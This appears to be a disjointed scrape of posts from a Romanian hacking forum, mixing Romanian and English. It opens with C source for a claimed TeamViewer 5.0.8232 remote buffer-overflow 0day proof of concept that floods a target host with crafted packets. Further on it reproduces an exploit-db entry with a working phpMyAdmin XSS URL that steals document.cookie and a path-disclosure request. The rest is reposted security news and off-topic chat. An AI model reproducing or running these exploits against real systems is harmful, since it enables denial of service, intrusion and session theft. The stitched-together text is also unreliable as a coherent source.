begood

#include<stdio.h>#include<sys/types.h> #include<sys/socket.h> #include<netinet/in.h> #include<unistd.h> #define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) #define POCNAME " [*]TeamViewer 5.0.8232 remote BOF poc(0day)" #define AUTHOR " [*]fl0 fl0w" typedef int i32; typedef char i8; typedef short i16; enum { True=1, False=0, Error=-1 }; struct linger ling = {1,1}; i8* host; i16 port; i32 ver1,ver2,slen; void syntax(){ i8 *help[]={"\t-h hostname", "\t-p port(default 5938)", }; i32 i; size_t com=sizeof help / sizeof help[0]; for(i=0;i<com;i++){ printf("%s\n",help[i]); } } i32 arguments(i32 argc,i8** argv){ i32 i; argc--; for(i=1;i<argc;i++){ switch(argv[i][1]){ case'h': host=argv[++i]; break; case'p': port=atoi(argv[++i]); break; default:{ printf("error with argument nr %d:(%s)\n",i,argv[i]); return Error; exit(0); } } } } i32 main(i32 argc,i8** argv){ if(argc<2){ printf("%s\n%s\n",POCNAME,AUTHOR); printf("\tToo few arguments\n syntax is:\n"); syntax(); exit(0); } arguments(argc,argv); i32 sok,i, svcon, sokaddr; i8 *sendbytes=ALOC(i8,32768), *recevbytes=ALOC(i8,5548); printf(" [*]Starting \n \t...\n"); struct sockaddr_in sockaddr_sok; sokaddr = sizeof(sockaddr_sok); sockaddr_sok.sin_family = AF_INET; sockaddr_sok.sin_addr.s_addr = inet_addr(host); sockaddr_sok.sin_port = htons(port); sok=socket(AF_INET,SOCK_STREAM,0); if(sok==-1){ printf(" [*]FAILED SOCKET\n"); exit(0); } if(svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr)<0){ printf("Error with connection\n"); shutdown(sok,1); exit(0); } if(setsockopt(sok, SOL_SOCKET, SO_LINGER, (i8*)&ling, sizeof(ling))<0){ printf("Error setting the socket\n"); shutdown(sok,1); exit(0); } if(recv(sok,&ver1,1,0)!=1) exit(0); if(recv(sok, &ver2,1,0)!=1) exit(0); memset(sendbytes,0,250); recv(sok,recevbytes,sizeof(recevbytes),0); for(i=0;;i++) { if(!(i & 15)) printf("%d\r", i); sendbytes[0] = ver1; sendbytes[1] = ver2; sendbytes[2] = (i & 1) ? 15 : 21; *(i16 *)(sendbytes + 3) = slen; if(send(sok, sendbytes, 5, 0) != 5) break; if(slen) { memset(sendbytes, i, slen); if(send(sok, sendbytes, slen, 0) != slen) break; } } shutdown(sok,1); return 0; } bravo pentru fl0 fl0w ! la cat mai multe !

ca iti era greu sa te uiti la "how it works"

Nowadays it is not surprising when people's blogs are attacked, especially when the blog owner is a well-known person. No matter how frustrated or disappointed the bloggers are, attacks still continue. If you search "my blog was hacked" on Google, you get 4,230,000 results; searching "my blog was hacked again" returns 2,380,000 matches, and the number keeps increasing daily. What we can see from the these rough stats? Apparently nearly 44% of attacked blogs are lucky and aren't attacked again, but over 56% of attacked blogs repeat the previous nightmare. So why does this happen? There are several reasons, but the one we should absolutely never ignore is the vulnerabilities of blog platforms themselves. According to the following Open Source CMS Market Share Report 2009, WordPress, which has the most downloads among all competitors, is dominating today's market along with Joomla! and Drupal. Therefore, we have used WordPress for our research. Websense® Security Labs™ ThreatSeeker™ Network has been monitoring the latest WordPress injection attack for over 2 weeks and has found over 250,000 injections occurring in the past half month. Moreover, over 37,000 URLs in the wild are still being injected according to our observations. As the following chart shows, the daily stats go up and down a few times and always end up higher, so we believe the hackers are still continuing their attack. WordPress is so widely used all over the world that every version of it is studied and exploited by hackers, even the latest version (2.9.2, released on December 18, 2009). The following chart reveals the percentage split of different WordPress releases affected in this attack. The following obfuscated malicious code snapshot shows what the injection looks like. The ultimate purpose of the attack is all about making money, as Sophos has already investigated. These attacks probably happened due to SQL injection via some known and unknown WordPress vulnerabilities. SecuriTeam maintains a list of 23 known WordPress vulnerabilities, and if you search on milw0rm.com, you get almost 60 results. This means that 60 different vulnerabilities have been discovered to exist in different versions of WordPress. Injection is not the only way for hackers to utilize those vulnerabilities; compromising a site is also a good option. It has often been reported that compromised Web sites are used for Blackhat SEO to push rogue AVs. Novirusthanks has a great analysis here, and more investigation indicates that the compromise behind the attack is connected to WordPress vulnerabilities. WordPress users should be very familiar with the injection or compromise attack since it has been used frequently in the past. Although WordPress has 2-3 releases every year and has 3 releases planned this year as usual, it has proved to be not enough: we still can see many victimized sites with the latest 2.9.2 installation. However, without the help from WordPress developers, there are still some measures we can take to harden our blogs. In addition, some WordPress plugins are also very helpful. Typically, bloggers choose WP Security Scan for vulnerability checks and WordPress Exploit Scanner for injection checks. Moreover, when attacks really happen, don't panic: a great guide is already there to help you clear up the mess. Websense Messaging and Websense Web Security customers are protected against this attack. Security Researcher: Elson Lai, Tim Xia WordPress Injection Attack - Security Labs Blog //putin mai vechi dar merita citit.

How long will your password stand up This document shows the approximate amount of time required for a computer or a cluster of computers to guess various passwords. The figures shown are approximate and are the maximum time required to guess each password using a simple brute force "key-search" attack, it may (and probably will) be possible to guess correctly without trying all the combinations shown using other methods of attack or by having a "lucky guess". http://www.lockdown.co.uk/?pg=combi

ii dau ban zilnic, deja ma distreaza faza

You can own the world with SQLi.

a fost postat acum 4 zile http://rstcenter.com/forum/22626-how-get-notified-when-someone-hacks-your-facebook.rst

hrana zeilor sau cum ? ciocolata cu ambrosia, suna interesant on: bun venit.

Interceptare convorbire. - Page 5 - RST http://rstcenter.com/forum/18939-mobile-phone-security-cracked-engleza.rst

A new McAfee report uncovered that a USB worm has taken the No. 1 spot for top malware worldwide. Spam trends show that email subjects vary greatly from country to country with diploma spam out of China and other Asian countries on the rise. Earthquake news and other major 2010 events drive poisoned Web searches, and U.S.-based servers host the majority of new malicious URLs. Threats on portable storage devices took the lead for the most popular malware. AutoRun related infections held the No. 1 and No. 3 spots due to the widespread adoption of removable devices, mainly USB drives. A variety of password-stealing Trojans rounded out the top five. Those include generic downloaders, unwanted programs and gaming software that collects statistics anonymously. Unlike past studies, the popularity of these threats ranked consistently worldwide. While spam rates remain steady, their subjects vary considerably from country to country. One of this quarter’s biggest discoveries was that China, South Korea and Vietnam have the most significant diploma spam, which promotes the purchase of forged documents to establish qualifications for items such as jobs. Singapore, Hong Kong and Japan have exceptional rates for Delivery Status Notification spam indicating a possible issue with preventative mail-filtering capabilities. Thailand, Romania, the Philippines, India, Indonesia, Colombia, Chile and Brazil have a higher portion of malware infections and spam. These countries have experienced significant Internet growth over the past five years and are lagging in security awareness. Attackers are leveraging major news events to poison Internet searches. Haiti and Chile earthquake disasters led the list (No. 1 and No. 2, respectively). The Toyota recall, Apple iPad and NCAA March Madness followed. Referred to as search engine manipulation, cybercriminals continue to use analytics and page-ranking logic to exploit hottest search terms and drive traffic to malicious websites. At 98 percent, the United States hosts the majority of new malicious URLs in Q1 2010. The massive share of new malicious URLs hosted in the U.S. is due to the location of many different Web 2.0 Services, most of which are provided with U.S. locations. Within the remaining 2 percent, China hosted 61 percent and Canada hosted 34 percent. Malware and spam trends continue to grow

Prey is a lightweight application that will help you track and find your laptop if it ever gets stolen. It works in all operating systems and not only is it Open Source but also completely free. Recover what is rightfully yours Prey helps you locate your missing laptop by sending timed reports with a bunch of information of its whereabouts. This includes the general status of the computer, a list of running programs and active connections, fully-detailed network and wifi information, a screenshot of the running desktop and — in case your laptop has an integrated webcam — a picture of the thief. Silent but deadly Prey uses a remote activation system which means the program sits silently in your computer until you actually want it to run. If so, it gathers all the information and sends it to your Prey web control panel or directly to your mailbox. The thief will never know his movements are being watched. And because there’s always hope You may be thinking “but what’s the point of this program if the guy will probably just format the thing right away?” and you’re completely right. However, experience shows that thieves tend to look in stolen computers for valuable information, so there’s actually a chance you can catch the guy (and there’s even some successful cases!). Besides, if by using Prey you can keep alive a tiny bit of hope that you’ll recover your computer, isn’t it already worth it? Track down your stolen laptop – Prey

The launch of two new Spotify services - Unlimited and Open - means two things. One, you don't need to spend a tenner to get rid of the ads; and two, Spotify Free's days are numbered. It's clear that Spotify Open, which delivers 20 hours of ad-funded music per month, is going to replace Spotify Free. If you're already a Free user then things won't change in the foreseeable future, and you can still offer invitations to others; however, we wouldn't be surprised if the ability to invite people to Spotify Free disappears fairly quickly. Check out Spotify's exact words: people are "still able to sign up… by obtaining one of the many millions of invites currently available." The key word there is "currently". A refreshing admission On the face of it the inevitable demise of Spotify Free is a bad thing, but we think it's actually quite refreshing. Spotify is basically saying "look, we can't afford to run unlimited streaming for everyone for free, so here's your choice: 25 albums a month for nowt, or as much as you want, ad-free, for a fiver." The problem for Spotify is that the music business doesn't care whether you're a paying customer or not; it just wants to be paid for the music Spotify streams. In an ideal world the odd advert would cover the cost of the relevant licenses, but this isn't an ideal world. There simply isn't enough advertising cash to go around. That means Spotify had a stark choice. If it carried on as normal, it would have to find ways to make more money from free customers. That means more ads, more invasive ads, and more attempts to mine personal data from profit. It's what you might call the Facebook model, and while it works for Facebook - so far, anyway - there's no guarantee it'd work for Spotify. This way is better. The free service isn't too limited, and the ad-free version is now half the price it was previously (Premium remains, but you only need to pay the extra fiver for that if you want offline access or the mobile service). Where Spotify got it wrong was in having a free service that was just too good, and a paid-for service that was just a little bit too pricey. It's addressed both of those issues, and the result should be an increase in the subscription numbers. It's a smart move - but it might also be too little, too late. If the rumour mill is correct, a streaming, subscription-based version of iTunes may be launching in just a few weeks time. Read more: Is this the end of Spotify Free? | News | TechRadar UK

"Any proof that quantum cryptography is perfect relies on idealized assumptions that don't always hold true in the real world. One such assumption is related to the types of errors that creep into quantum messages. Alice and Bob always keep a careful eye on the level of errors in their messages because they know that Eve will introduce errors if she intercepts and reads any of the quantum bits in a message. So a high error rate is a sign that the message is being overheard. But it is impossible to get rid of errors entirely, so Alice and Bob have to tolerate a small level of error. This level is well known. Various proofs show that if the quantum bit error rate is less than 20 percent, then the message is secure. However, these proofs assume that the errors are the result of noise from the environment. Now, physicists have come up with an attack based on the realization that Alice also introduces errors when she prepares the required quantum states to send to Bob. This extra noise allows Eve to intercept some of the quantum bits, read them and then send them on, in a way that raises the error rate to only 19.7 percent. In this kind of 'intercept and resend attack,' the error rate stays below the 20 percent threshold and Alice and Bob are none the wiser, happily exchanging keys while Eve listens in unchallenged. The physicists say they have successfully used their hack on a commercial quantum cryptography system from the Geneva-based startup ID Quantique." Slashdot | Commercial Quantum Cryptography System Hacked

Onapsis Research Labs is proud to announce the release of Bizploit, the first opensource ERP Penetration Testing framework. Presented at HITB Dubai, one of the most renowned security conferences in the world, Bizploit is expected to provide the security community with a basic framework to support the discovery, exploration, vulnerability assessment and exploitation of ERP systems. The term "ERP Security" has been so far understood by most of the IT Security and Auditing industries as a synonym of “Segregation of Duties”. While this aspect is absolutely important for the overall security of the Organization's core business platforms, there are other threats that are still overlooked and imply much higher levels of risk. Onapsis Bizploit is designed as an academic proof-of-concept that will help to illustrate these kind of risks. Currently Onapsis Bizploit is shipped with modules focused in the SAP business platform, but updates for other popular ERPs are expected to be included in the short term. Bizploit - The Opensource ERP Penetration Testing Framework has been released :: Hack In The Box :: Keeping Knowledge Free

[URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#viewSource"]view source[/URL] [URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#printSource"]print[/URL][URL="http://www.exploit-db.com/exploits/12642?utm_source=twitterfeed&utm_medium=twitter#about"]?[/URL] # Exploit Title: phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path Disclosure. # Date: 20/04/10 # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | [URL="http://www.digitalwhisper.co.il/"]www.DigitalWhisper.co.il[/URL] # Software Link: [URL="http://www.phpmyadmin.net/"]www.phpmyadmin.net[/URL] | [url=http://www.phpmyadmin.net/home_page/downloads.php]phpMyAdmin - Download[/url] # Version: 2.6.3-pl1 # Tested on: PHP # ##[Cross Site Scripting]* (Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it) http:// [server]/phpmyadmin/left.php?lang=he-iso-8859-8-i&server=1&hash=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E # # ##[FULL PATH DICSLOSURE]** (Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)) # http:// [server]/phpmyadmin/sql.php?lang=he-iso-8859-8-i&server=1&db=x&table=x&sql_query=1' # Will returne: # Fatal error: Cannot use string offset as an array in [FPD] on line 901 # # *The victim must be logged in. **The attacker must be logged in. # # [e0f]

ce fmm nu-ti convine si tie ?

Interested in Viagra, Cialis and some other "magical" medications? It seems that the MIT web site for the Lean Advancement Initiative (Lean Advancement Initiative ) knows a bit about it: Joking aside, they got hacked and are being used to serve a lot of SPAM. In fact, we were fixing a web site that had a lot of links to it: <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=bestellen-viagra">original viagra bestellen</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=original-viagra-rezeptfrei">original viagra rezeptfrei</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=viagra-droga-generica">viagra droga generica</a> .. <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=viagra-verpackung">viagra verpackung</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=tabletten-cialis">cialis filmtabletten</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=viagra-kaufen-test">viagra kaufen test</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=viagra-50-mg-preis">viagra original preis</a> <a href="http://lean.mit.edu/blind/products/lesat/lesat.php?pills=g--nstig-viagra">günstig viagra</a> The script is also a bit clever, so if you visit it without any argument, it returns a 404 (try http://lean.mit.edu/blind/products/lesat/lesat.php ). If you visit with an argument, it shows the spam: (try Viagra wo bestellen, bestellen viagra, original viagra bestellen Potenzmittel in Apotheke - Lean Advancement Initiative ) The code being used is probably very similar to this one: Sucuri Security: It is not over - SEO Spam on sites infected

one step at a time. nu intram din nou in dezbateri linux vs. windows, am ales acest sistem de operare ca-l stiu ca-n palma, e mult mai stabil ca ubuntu de exemplu, care face lag nasol la multitasking. atentie, care mai devieaza si provoaca dezbateri, se poate alege cu warn.

n-am instalat nimic, am folosit doar Ghost 8.0 (are 1.66 MB) http://www.multiupload.com/CA10CO9HBC imaginea ghost am facut-o in urmatorul fel : setat in CD drive (in virtual box) un windows live cd (creat de mine prin 2007), am introdus stickul de 16 GB, bootat de pe CD, rulat ghost32.exe, disc to image => save to stick. si cu asta basta. are 470 MB dar cred ca pot sa-l fac si mai mic. daca doresti sa-l testezi pe sistemul propriu, contacteaza-ma.

Acum iti creez imagine ghost, fac video sa inteleaga si prietenul tau cum se instaleaza. Va consuma 80 MB RAM, dupa instalare.

Am reusit ! Cu putine batai de cap, dar am reusit sa fac o imagine Ghost la imaginea VDI ! Ce inseamna asta ? Veti putea migra orice versiune de RSTcore pe HDD personal in mai putin de 5 minute mai multe a2480f25: Vesti bune !

@piratu' multam din varianta VDI poti face o imagine ghost, iar aia o poti folosi ca sistem de operare (e doar o presupunere, acum testez.)

bine, dar nu asta-i ideea. ci ordinea in care sunt citite de sistemul de operare pentru boot-up, acea ordine sa fie si cea fizica, pe disc. asa nu mai misca acul in alta parte pe disc, ci il citeste "dintr-una", fara intreruperi => viteza sporita.

E de rahat. E practic transparent.

ba da, dar pe masura ce sistemul de operare e incarcat cu alte programe, se schimba ordinea.